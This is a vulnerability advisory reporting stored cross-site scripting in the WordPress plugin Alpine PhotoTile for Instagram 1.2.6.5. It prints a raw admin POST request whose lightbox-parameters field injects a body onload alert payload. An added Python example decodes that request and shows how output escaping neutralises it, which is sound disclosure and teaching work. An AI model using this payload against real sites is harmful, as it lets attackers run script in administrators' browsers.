# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================

# ==============================================================
# XSS

------
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300

hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
------

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
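
Added example, not part of the original advisory or the plugin's code: it URL-decodes the request body shown above, flags the field that carries HTML-significant characters, and renders that value into a form field with and without output escaping. The `render_input` template, and the idea that the settings page echoes the value back into an attribute, are assumptions; the advisory does not show the plugin's source.

```python
# Added example: decode the advisory's form body and compare raw vs. escaped output.
from html import escape
from urllib.parse import parse_qsl

# Request body copied from the advisory above.
BODY = (
    "hidden=Y&general_highlight_color=%2364a2d8"
    "&general_lightbox=alpine-fancybox"
    "&general_lightbox_params='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"
    "&general_block_users=&hidden_widget_alignment=1&cache_time=4"
    "&alpine-photo-tile-for-instagram-settings_plugin-settings"
    "%5Bsubmit-plugin-settings%5D=Save+Settings"
)

# Characters that can end an attribute value or open a tag.
MARKUP_CHARS = set("<>\"'")


def decode_fields(body):
    """URL-decode the form body, keeping empty fields such as general_block_users."""
    return dict(parse_qsl(body, keep_blank_values=True))


def fields_with_markup(fields):
    """Names of fields whose decoded value holds HTML-significant characters."""
    return sorted(k for k, v in fields.items() if MARKUP_CHARS & set(v))


def render_input(name, value, escape_output):
    """Hypothetical settings-form field (assumption: not the plugin's real template)."""
    shown = escape(value, quote=True) if escape_output else value
    return f"<input type='text' name='{name}' value='{shown}'>"


if __name__ == "__main__":
    fields = decode_fields(BODY)
    for name in fields_with_markup(fields):
        print("decoded:  ", fields[name])
        print("unescaped:", render_input(name, fields[name], False))
        print("escaped:  ", render_input(name, fields[name], True))
```

In WordPress itself the equivalent of `html.escape(..., quote=True)` for attribute output is `esc_attr()`.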